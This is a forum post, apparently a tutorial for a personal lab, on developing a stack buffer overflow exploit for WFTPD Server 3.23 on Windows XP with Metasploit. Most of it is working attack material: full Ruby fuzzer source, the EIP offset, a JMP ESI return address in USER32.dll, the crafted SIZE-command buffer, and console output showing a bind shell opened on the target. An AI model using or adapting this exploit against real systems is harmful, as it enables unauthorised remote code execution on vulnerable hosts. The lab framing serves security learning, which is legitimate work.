Adding another module to the Metasploit Unleashed course, exploit development

[Lincoln]

I am transferring this over from the old RE forums, because I think i's a helpful guide for those interested in adding another application to the exploit module in the Metasploit Unleashed - Mastering the Framework course. The guide also goes into detail about exploit development using Metasploit. This guide is not part of the course, and the author can not be held responsible if the subsequent modules from the Metasploit Unleashed course no longer work or conflict the with the initial setup. Here is the original post:

I did the Metasploit Unleashed course over the holiday weekend and I want to say WOW! Amazing work, enjoyed it so much!

I wanted to add another application to fuzz and exploit for my own lab, and then I ended up getting carried away and wrote a small guide/module for the course. It plays off the existing modules. There's nothing really 'spectacular' about the guide especially in comparison to the course, but it brings up a good point that happened to me when I installed the FTP server and tried to exploit it.

__________________________________________
Simple FTP Fuzzer

Remember the carpenter's mantra: measure twice, cut once? Well, the same can be applied for creating exploits. We'll take for example our target running running WFTPD Server 3.23 on our XP machine.

First, will go ahead and download the software: https://www.securinfos.info/old-soft...vulnerable.php

If you installed the FTP server in Windows components, please uninstall it before installing the software. Go to the Control Panel and open 'Add or Remove Programs'. Select 'Add/Remove Windows Components' on the left-hand side. Double click on 'Internet Information Services (IIS)' and un-check 'File Transfer Protocol FTP Service'

Install the software, add a FTP user and password with full rights and enable logging.

After running our enumeration scans we see this exploit is already written in Metasploit and decide to go ahead and try it. Set the options and payload and run the exploit. Also make sure to specify the target as it defaults to Windows 2000 Pro SP4.



And the results are....."Exploit completed, but no session was created."



Well...we got a crash, but no bind shell. In fact if we we're doing a pentest and that was our only way into the network, we just blew it! The application would have to be reset for us to get another shot! This is where 'measure twice, cut once', comes into play. A good rule of thumb is to always test your exploits before firing them off. Create a lab, as we've done, and test it before you try it on the actual target. The great thing about Metasploit is that it allows you to reuse and modify code very easily. We see the exploit that was already built in doesn't work, so we are going to have to fix it!

If we hook a debugger up we see the crash comes right at the jump code. Normally a simple fix would be just to change the jump code, since the current one does not appear to work. Since we want to be thorough, we are going to test this exploit from scratch, using our previously made IMAP fuzzer. First we'll go ahead and make a few minor changes in the code.

Code:

root@BT4VM:/pentest/exploits/framework3/modules/auxiliary/fuzzers# chmod 755 ftpfuzz.rb
root@BT4VM:/pentest/exploits/framework3/modules/auxiliary/fuzzers# cat ftpfuzz.rb
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Auxiliary

    include Msf::Exploit::Remote::Ftp
    include Msf::Auxiliary::Dos

    def initialize
        super(
            'Name'           => 'Simple FTP Fuzzer',
            'Description'    => %q{
                                An example of how to build a simple FTP fuzzer.
                                Account FTP credentials are required in this fuzzer.
                        },
            'Author'         => [ 'ryujin' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 1 $'
        )
    end

    def fuzz_str()
        return Rex::Text.rand_text_alphanumeric(rand(1024))
    end

    def run()
        srand(0)
        while (true)
            connected = connect_login()
            if not connected
                print_status("Host is not responding - this is G00D ;)")
                break
            end
            print_status("Generating fuzzed data...")
            fuzzed = "\x41" * 1500
            print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)
            req = "SIZE /" + fuzzed +  "\r\n"
            print_status(req)
            res = raw_send_recv(req)
            print_status(res)
            disconnect()
        end
    end
end

We see that only a few minor changes are needed. The original exploit uses the "SIZE" command followed by "/" and a long character string. We know this portion of the code works, since we we're able to crash the application. This can be verified by looking at the original code or by inspecting the packets sent over the network with Wireshark

Code:

cat /pentest/exploits/framework3/modules/exploits/windows/ftp/wftpd_size.rb

Lets go ahead and fire back up metasploit and see how this looks.

[Lincoln]

Attach your debugger to the application on your Windows machine and then test the fuzzer out.



Looks like we have control of EIP and the buffer string was written into ESP and ESI. Now to find the exact offset that EIP is overwritten at, so we can control the application.

Will go ahead and edit out FTP fuzzer and modify our 'fuzzed' string.

Code:

fuzzed = Rex::Text.pattern_create(1500)

We can then create a unique pattern combined with pattern_offset.rb to find the location where EIP is overwritten. Will go ahead and open back up Metasploit, plug in the same options as before, and run it.

We take the hex location from EIP and convert it to ASCII and run it through patter_offset.rb. We see the location is 525 bytes until EIP. We can then edit our fuzzer to confirm this is correct.

Code:

fuzzed = "\x41" * 525 + "\x42" * 4 + "\xCC" * 900

The result is as expected and we now have control of the program.



The last thing will want to do before trying our exploit out with a payload, is to get a working jump address into ESI. We want to execute a JMP ESI instruction at our EIP overwrite. We can search for one in our debugger using ctrl + f to find a command. Enter 'JMP ESI' minus the quotes. We see there is no JMP ESI in our application, so we are going to have to look at the running executable modules. Click on the executable "E" button on the top and then double click on the USER32.dll and run the same search again. We find the address 0X77D4E23B is a JMP ESI command. Also while we're here, lets set a break point at that address by pressing f2. That way we can do one last test to make sure we control the flow of execution.

Change our fuzzer with our jump command.

Code:

fuzzed = "\x41" * 525 + "\x3b\xe2\xd4\x77" + "\xCC" * 900

After our fuzzer is ran for the last time we see we hit our break point.



We can then single step through the program by pressing f9 and we see the jump is made and we land in out "\xCC" bytes.

We could take this further and test different payloads, bad characters, etc, but the objective of this guide was to get a working exploit. We know the exploit that came with Metasploit needed to be fixed. Since now we have control of the program we can modify the original exploit with the new jump code and it should work.

Code:

nano /pentest/exploits/framework3/modules/exploits/windows/ftp/wftpd_size.rb

After modifying the exploit, will open back up Metasploit and use the same exploit with the same options as before in the beginning.

Code:

msf exploit(wftpd_size) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   FTPPASS  lincoln          no        The password for the specified username
   FTPUSER  lincoln          no        The username to authenticate as
   RHOST    192.168.2.128    yes       The target address
   RPORT    21               yes       The target port


Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     192.168.2.128    no        The target address


Exploit target:

   Id  Name
   --  ----
   2   Windows XP Pro SP2 English


msf exploit(wftpd_size) > exploit[*] Started bind handler[*] Connecting to FTP server 192.168.2.128:21...[*] Connected to target FTP server.[*] Authenticating as lincoln with password lincoln...[*] Sending password...[*] Trying target Windows XP Pro SP2 English...[*] Command shell session 1 opened (192.168.2.129:56694 -> 192.168.2.128:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop\wftpd323>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection 2:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.2.128
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.2.2

C:\Documents and Settings\Administrator\Desktop\wftpd323>